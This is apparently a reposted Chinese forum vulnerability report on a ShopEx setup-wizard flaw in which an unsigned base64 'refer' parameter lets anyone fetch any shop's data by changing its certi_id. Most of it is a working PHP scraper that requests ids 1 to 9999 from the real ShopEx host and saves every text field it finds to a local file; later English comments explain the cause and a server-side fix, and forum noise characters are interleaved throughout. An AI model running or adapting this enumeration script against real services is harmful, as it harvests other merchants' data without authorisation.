简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
/ V# }/ r+ k9 d9 N' D7 t. D
" ]& R- x/ K( I( s$ \" x6 a- s! _' K. T9 d( z3 g9 g4 ] u& \0 w
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
, R9 m- A( O `1 S" ^) A- S7 ^& R5 Y
! [& U5 T, [3 v) l( F: r/ r) _3 M
4 w o9 t; O5 x2 M; m& l
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
( w: {' U( b; h7 f) d* e
; d# g8 k( x6 x$ H* ~) k' t- l% e% ]- P& o( b
% i; M2 y% o3 [+ s. N) e* b4 r
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
6 {! v8 _" K2 D& \! o j% p: f4 o& Z5 y/ h& ^6 e
, z* j% n( O8 o
* J7 ~4 y8 f" k' g+ P3 z0 ^8 e& I<?php
// NOTE(review): this listing is interleaved with forum anti-copy noise
// characters; the PHP statements are the recognisable tokens on each line.
// Driver loop: calls ShowshopExD() once per certi_id from 1 to 9999. The
// identifier is chosen entirely by the caller, which is the enumeration
// (IDOR-style) pattern the advisory above describes.
3 E2 N9 V2 B2 G8 t2 z8 E* }! w% s/ Z& V$ ~: O/ B6 \/ F, U
for ($i=1; $i < 10000; $i++) { // walk certi_id 1..9999
3 F! @$ g) \% r. t' z% \5 n3 M ShowshopExD($i);% S! j1 n8 U$ D! o
6 j9 K- k) H5 w: y. o3 E6 s3 p1 E
}/ i$ z' F4 W$ C* j
// ShowshopExD($cid): fetches the ShopEx setup-wizard page step2.php for one
// certi_id and records the name/value pairs of every text <input> in the
// response.
//
// Root cause, from a defender's view: the server identifies the shop solely
// from the client-supplied, unsigned base64 "refer" parameter (certi_id plus a
// callback_url), so any caller can request any shop's wizard data. The fix on
// the server side is to bind certi_id to the authenticated session or a signed,
// expiring token instead of trusting the query string; sequential certi_id
// requests from one client are also an easy detection signal.
//
// Parameters:
//   $cid - the certi_id to request (coerced with intval before use).
// Returns nothing; side effects are the HTTP request, echo output and an append
// to c:/shopEx.txt. Requires the curl and mbstring extensions.
: P& V% t b( k( |# h4 E function ShowshopExD($cid) {1 u9 F# h6 [- r: O" c0 L6 c
% ?) d6 j; `1 e; p% X' R $url='http://guide.ecos.shopex.cn/step2.php';' \2 a% a( o* {; r* x
// The refer value is the base64 of a JSON object; only certi_id varies, the
// callback_url is a fixed placeholder host.
. n4 N+ {, A4 p8 @, f $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
0 t, f; Q5 o( K3 n& K/ f# s/ }7 s5 {3 H v
$url = $url.'?refer='.$refer;! [# E( V4 a+ _0 F7 n3 _& r
& V0 Y, O' g8 j4 ^+ |/ q8 d
$ch = curl_init($url);2 P% c4 Y! C- d
: K7 t3 q6 y4 [; S
// Return the body as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
' C. y' X9 P- V5 Q) Y" F5 B' o
8 F/ Z. r5 G/ W' y+ K# `/ V curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;" `6 w" s, k7 g4 a% w) u7 }5 Z
. ^ S7 ?! i0 {4 ?- ~* d; W
// NOTE(review): curl_exec() returns false on transport failure; that case is
// not checked before the string functions below.
$result = curl_exec($ch);
6 r2 o- i2 _2 s# b
// Re-encode the UTF-8 response to gb2312 for the (Windows/console) output.
1 t+ d$ `3 R( L& {) c5 Q $result = mb_convert_encoding($result, "gb2312", "UTF-8");
9 c& j- e0 g* n& y/ T Z) o; Y/ |) r2 E8 V
// Treat the id as valid only if the page echoes the refer value back.
// NOTE(review): strpos() returns 0 (falsy) for a match at offset 0, so a
// `!== false` comparison would be the strict form.
if(strpos($result,$refer))$ \2 T. i- { z7 K9 K( |9 G7 P; A% `' k
4 M/ V4 w; Z3 c/ c4 n% L {4 S+ C& H( u7 q; i
& p' h$ R7 A; Z( A& Q$ J
// Append-binary mode; the fopen() result is not checked for failure.
$fp = fopen("c:/shopEx.txt",'ab'); // output file for the harvested fields
5 p0 g" @. L$ c, O- V( c/ ~' D9 o+ V l% `
// Capture the attribute text of every self-closing <input type="text" .../>.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
: A: K& }3 [- X, d" c% U7 A" Y/ m/ _" Q9 J I
foreach ($value[1] as $key) {
: n2 H& i" C# x% ^$ `; Y5 D4 V4 x- Z% l: {' @2 y
// Pull name="..." and value="..." out of the attribute string; assumes the
// name attribute precedes the value attribute in the markup.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);& O( I% z/ _$ a$ A6 @% i: v0 E* S
" v" I- ^: H L) @! L8 @( h6 {3 @
echo $res[1][0].':'.$res[3][0]."\r\n";% a) `: q) j( @2 z9 [
5 G, Z9 u' l. Y% I, a; [9 w
// Same "name:value" line as echoed above, written to the file.
$col =$res[1][0].':'.$res[3][0]."\r\n";
: x8 G# B) r. z! n9 b5 b+ @0 W2 D
. y. ?$ x9 E$ S, y# ] fwrite($fp, $col, strlen($col));
$ E- j# ?9 R% r1 s& L6 }* F
/ H! N- r* W2 n \6 X/ v! z }/ q7 g0 ~5 B8 A1 g: V
0 a! a5 v# _9 @4 k) j
// Separator between records on stdout only (not written to the file).
echo '--------------------------------'."\r\n";
7 T. M2 [7 h2 @- e% {7 @. o
' ^! y% {6 V0 ~. d fclose($fp); 1 v4 L2 |7 W0 |
4 \/ j: `( v& m }6 L: e- \: v, S8 H( v: L
8 B; N* R+ Q% {. R4 @' Z) d$ P
flush();+ J: R2 G; ]: F: |: n
3 l2 ]3 U$ R7 w
curl_close($ch);
" p' S2 U& P! }+ ^" [% M4 K1 c& y$ s6 q
}5 K# ^4 Z# ]6 {" P
- ]9 H. N7 Z2 ^- Z! @4 g+ W
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式